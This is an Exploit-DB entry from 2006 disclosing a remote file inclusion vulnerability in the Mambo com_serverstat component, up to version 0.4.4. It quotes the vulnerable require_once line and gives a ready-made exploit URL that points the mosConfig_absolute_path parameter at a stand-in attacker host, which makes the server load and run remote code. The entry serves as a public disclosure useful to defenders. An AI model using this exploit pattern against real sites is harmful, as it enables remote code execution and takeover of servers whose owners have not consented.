Mambo Component com_serverstat 0.4.4 - Remote File Inclusion

EDB-ID:

2367




Platform:

PHP

Date:

2006-09-14


=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Mambo com_serverstat Component <=0.4.4 Remote File Include Vulnerability
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Author: xoron (turkish hacker)
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Class : Remote
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Vuln Code: require_once($mosConfig_absolute_path."/administrator/components/com_serverstat/config.serverstat.php");
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Exploit: administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://evil_scripts?
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
Thanx : str0ke, Ironfist, Preddy, SHiKaA
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=

# milw0rm.com [2006-09-14]